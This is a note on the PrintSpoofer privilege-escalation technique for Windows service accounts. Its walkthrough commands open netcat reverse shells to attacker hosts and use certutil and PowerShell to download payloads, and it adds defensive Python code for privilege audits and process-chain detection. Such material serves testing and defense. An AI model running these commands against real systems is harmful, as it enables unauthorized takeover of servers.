PrintSpoofer exploits SeImpersonatePrivilege to escalate from service accounts to NT AUTHORITY\SYSTEM on Windows Server 2016, Server 2019, and Windows 10.
- Service account with SeImpersonatePrivilege (e.g., IIS AppPool, SQL Server, DNN application pool)
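The defender's first check is whether a given service identity actually holds this privilege. The Python helper below is an added example, not part of the PrintSpoofer project: it parses the text output of `whoami /priv` (or the PRIVILEGES INFORMATION section of `whoami /all`) and reports the impersonation-class privileges the token holds. The sample output is constructed, shaped like the output for NT AUTHORITY\LOCAL SERVICE, and the privilege list checked is an assumption of this example. Note that a privilege listed as Disabled is still held by the token and can be enabled by the process itself, so only its absence counts as a mitigation.

```python
"""Parse `whoami /priv` / `whoami /all` output and flag token privileges that
allow impersonation-based escalation (added example; sample text is
constructed, not captured from a real host)."""

# Privileges that let the holder act under another security context.
# SeImpersonatePrivilege is the one PrintSpoofer needs; SeAssignPrimaryTokenPrivilege
# is the companion privilege normally granted to the same service identities.
IMPERSONATION_PRIVILEGES = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")

# Constructed sample, shaped like `whoami /all` for NT AUTHORITY\LOCAL SERVICE
# (well-known SID S-1-5-19), trimmed to the USER and PRIVILEGES sections.
SAMPLE_WHOAMI_ALL = """\
USER INFORMATION
----------------

User Name                  SID
========================== ========
nt authority\\local service S-1-5-19


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_privileges(text):
    """Return [{'name', 'description', 'enabled'}] for each row of the
    PRIVILEGES INFORMATION table. Works on `whoami /priv` output and on the
    privileges section of `whoami /all`; other sections are skipped."""
    rows = []
    in_section = in_table = False
    for line in text.splitlines():
        if line.startswith("PRIVILEGES INFORMATION"):
            in_section = True
            continue
        if in_section and not in_table:
            # The table body starts after the '=====' underline row.
            in_table = line.startswith("====")
            continue
        if in_table:
            if not line.strip():
                break  # a blank line ends the table
            parts = line.split()
            # Columns are fixed width; name and state are single tokens,
            # so everything in between is the description.
            rows.append({
                "name": parts[0],
                "description": " ".join(parts[1:-1]),
                "enabled": parts[-1].lower() == "enabled",
            })
    return rows


def impersonation_risk(rows):
    """Names of impersonation-class privileges present in the token.
    A privilege shown as Disabled is still held: the process can enable it
    itself, so Disabled is not a mitigation; only absence is."""
    return sorted(r["name"] for r in rows if r["name"] in IMPERSONATION_PRIVILEGES)


if __name__ == "__main__":
    privs = parse_privileges(SAMPLE_WHOAMI_ALL)
    for name in impersonation_risk(privs):
        print(f"held: {name}")
```

Run it against the captured output of each application-pool or service identity in an audit; an empty result means the identity cannot be used with this technique, whatever the State column says.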
```
# Spawn interactive SYSTEM shell
PrintSpoofer.exe -i -c cmd

# Using PrintSpoofer64 with a reverse shell
PrintSpoofer64.exe -c "c:\path\to\nc.exe ATTACKER_IP PORT -e cmd"
```

```
# Confirm privileges
whoami /priv
# Look for: SeImpersonatePrivilege Enabled

# Upload PrintSpoofer64.exe and nc.exe to a writable directory
# Execute reverse shell as SYSTEM
c:\DotNetNuke\Portals\0\PrintSpoofer64.exe -c "c:\DotNetNuke\Portals\0\nc.exe 10.10.14.15 443 -e cmd"

# On attack host, catch the shell
nc -lvnp 443
# whoami → nt authority\system
```

If a webshell runs as nt authority\local service and has SeImpersonatePrivilege, upload a reverse shell and PrintSpoofer64.exe to a writable directory such as C:\Windows\System32\spool\drivers\color.
```
whoami /all
:: SeImpersonatePrivilege        Impersonate a client after authentication Enabled

certutil -urlcache -f http://ATTACKER_IP:8000/shell.exe C:\Windows\System32\spool\drivers\color\shell.exe
powershell -c "iwr -uri http://ATTACKER_IP:8000/PrintSpoofer64.exe -outfile C:\Windows\System32\spool\drivers\color\PrintSpoofer64.exe"
C:\Windows\System32\spool\drivers\color\PrintSpoofer64.exe -c "C:\Windows\System32\spool\drivers\color\shell.exe"
```

On the listener:

```
connect to [ATTACKER_IP] from TARGET
C:\Windows\system32>whoami
nt authority\system
```
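On the telemetry side, both walkthroughs above leave two process-creation signals: a service identity launching an executable from a writable drop directory, and a process running as NT AUTHORITY\SYSTEM whose parent ran as a service identity (the child is created with the impersonated token, so the privilege jump shows up in the parent/child user pair). The Python detection below is an added example, not part of PrintSpoofer or any vendor's rule set. The event schema (pid, ppid, image, command line, user), the sample events and the list of drop directories are constructed for this example and modelled on the commands shown above; a SYSTEM parent spawning a service-identity child (the normal svchost to w3wp direction) is deliberately not alerted on.

```python
"""Detection over process-creation events for the service-to-SYSTEM pattern
shown in the walkthroughs (added example; schema and events are constructed)."""
from dataclasses import dataclass

SYSTEM = "nt authority\\system"
# Well-known service identities plus the IIS application-pool identity prefix.
SERVICE_IDENTITIES = {"nt authority\\local service", "nt authority\\network service"}
SERVICE_PREFIXES = ("iis apppool\\",)
# Directories used as drop locations in the walkthroughs; extend per environment.
DROP_DIRS = (
    "c:\\windows\\system32\\spool\\drivers\\color\\",
    "c:\\dotnetnuke\\portals\\",
)


@dataclass(frozen=True)
class ProcEvent:
    """Simplified process-creation record (constructed schema, not a Sysmon/ETW layout)."""
    pid: int
    ppid: int
    image: str
    command_line: str
    user: str


def is_service_identity(user):
    u = user.lower()
    return u in SERVICE_IDENTITIES or u.startswith(SERVICE_PREFIXES)


def detect(events):
    """Return (rule, pid) alerts. The parent's identity is resolved by joining on
    ppid, so the rule does not depend on the log source carrying a parent-user field."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        image = e.image.lower()
        # Rule 1: a service identity executing from a writable drop directory.
        if is_service_identity(e.user) and image.startswith(DROP_DIRS):
            alerts.append(("service_exec_from_drop_dir", e.pid))
        # Rule 2: privilege jump, a SYSTEM child of a service-identity parent.
        parent = by_pid.get(e.ppid)
        if parent is not None and e.user.lower() == SYSTEM and is_service_identity(parent.user):
            alerts.append(("service_identity_spawned_system", e.pid))
    return alerts


# Constructed sample modelled on the walkthrough: IIS worker -> PrintSpoofer64 from the
# colour-profile directory -> cmd.exe as SYSTEM, alongside normal SYSTEM activity.
SAMPLE_EVENTS = [
    ProcEvent(500, 4, "C:\\Windows\\System32\\services.exe", "services.exe", "NT AUTHORITY\\SYSTEM"),
    ProcEvent(900, 500, "C:\\Windows\\System32\\svchost.exe", "svchost.exe", "NT AUTHORITY\\SYSTEM"),
    ProcEvent(4100, 900, "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "w3wp.exe -ap DefaultAppPool",
              "IIS APPPOOL\\DefaultAppPool"),
    ProcEvent(4220, 4100, "C:\\Windows\\System32\\spool\\drivers\\color\\PrintSpoofer64.exe",
              "PrintSpoofer64.exe -c cmd", "IIS APPPOOL\\DefaultAppPool"),
    ProcEvent(4260, 4220, "C:\\Windows\\System32\\cmd.exe", "cmd", "NT AUTHORITY\\SYSTEM"),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Rule 2 is the one worth keeping even when the drop directory is unknown: in ordinary operation a process running as an application-pool or LOCAL/NETWORK SERVICE identity has no business creating children as SYSTEM, so that parent/child pair is a high-signal event regardless of which tool produced it.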